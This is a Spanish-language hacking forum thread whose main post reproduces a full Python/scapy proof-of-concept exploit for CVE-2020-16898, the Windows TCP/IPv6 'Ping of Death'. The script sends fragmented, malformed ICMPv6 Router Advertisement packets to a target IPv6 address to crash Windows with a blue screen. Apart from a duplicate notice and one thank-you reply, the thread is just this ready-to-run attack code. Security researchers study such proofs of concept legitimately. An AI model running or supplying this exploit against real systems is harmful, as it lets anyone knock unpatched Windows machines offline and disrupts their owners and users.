elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Curso de javascript por TickTack


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  PoC Proof-of-Concept - Ping de la Muerte | BSOD exploit for CVE-2020-16898 | Windows TCP/IPv6
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: PoC Proof-of-Concept - Ping de la Muerte | BSOD exploit for CVE-2020-16898 | Windows TCP/IPv6  (Leído 3,111 veces)
el-brujo
ehn
***
Desconectado Desconectado

Mensajes: 21.586


La libertad no se suplica, se conquista


Ver Perfil WWW
PoC Proof-of-Concept - Ping de la Muerte | BSOD exploit for CVE-2020-16898 | Windows TCP/IPv6
« en: 5 Enero 2021, 01:16 am »

Código
  1. #!/usr/bin/env python3
  2. #
  3. # Proof-of-Concept / BSOD exploit for CVE-2020-16898 - Windows TCP/IP Remote Code Execution Vulnerability
  4. #
  5. # Author: Adam 'pi3' Zabrocki
  6. # http://pi3.com.pl
  7. #
  8.  
  9. from scapy.all import *
  10.  
  11. v6_dst = "fd12:db80:b052:0:7ca6:e06e:acc1:481b"
  12. v6_src = "fe80::24f5:a2ff:fe30:8890"
  13.  
  14. p_test_half = 'A'.encode()*8 + b"\x18\x30" + b"\xFF\x18"
  15. p_test = p_test_half + 'A'.encode()*4
  16.  
  17. c = ICMPv6NDOptEFA();
  18.  
  19. e = ICMPv6NDOptRDNSS()
  20. e.len = 21
  21. e.dns = [
  22. "AAAA:AAAA:AAAA:AAAA:FFFF:AAAA:AAAA:AAAA",
  23. "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
  24. "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
  25. "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
  26. "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
  27. "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
  28. "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
  29. "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
  30. "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
  31. "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]
  32.  
  33. pkt = ICMPv6ND_RA() / ICMPv6NDOptRDNSS(len=8) / \
  34.      Raw(load='A'.encode()*16*2 + p_test_half + b"\x18\xa0"*6) / c / e / c / e / c / e / c / e / c / e / e / e / e / e / e / e
  35.  
  36. p_test_frag = IPv6(dst=v6_dst, src=v6_src, hlim=255)/ \
  37.              IPv6ExtHdrFragment()/pkt
  38.  
  39. l=fragment6(p_test_frag, 200)
  40.  
  41. for p in l:
  42.    send(p)
  43.  
  44.  

Vaya, es repetido, ya lo puse en:

https://foro.elhacker.net/bugs_y_exploits/ping_de_la_muerte_para_windows_10_ipv6-t507320.0.html
« Última modificación: 15 Enero 2021, 20:16 pm por el-brujo » En línea

Usuario887


Desconectado Desconectado

Mensajes: 310


Ver Perfil
Re: PoC Proof-of-Concept - Ping de la Muerte | BSOD exploit for CVE-2020-16898 | Windows TCP/IPv6
« Respuesta #1 en: 19 Enero 2021, 13:19 pm »

Gracias por subirlo. Hace bastante que me moria de la intriga.
Curiosa forma de funcionar...
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
WordPress Last Referers HTML INJECTION Proof of Concept
Nivel Web
ZoneMx 2 18,773 Último mensaje 28 Enero 2008, 14:37 pm
por 6666
Lamborghini Minotauro Concept 2020
Foro Libre
ALEX_21_3 1 2,914 Último mensaje 29 Mayo 2010, 10:30 am
por La Muertع Blancα
Ping De La Muerte
Dudas Generales
CaZ4d0R 9 17,626 Último mensaje 14 Julio 2010, 11:35 am
por mnemonic
Ping de la muerte para Windows 10 (Ipv6)
Bugs y Exploits
el-brujo 2 7,345 Último mensaje 19 Octubre 2020, 16:24 pm
por el-brujo
Ruta en Windows 10 provoca pantalla azul de la muerte BSOD
Bugs y Exploits
el-brujo 0 3,039 Último mensaje 19 Enero 2021, 23:28 pm
por el-brujo
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines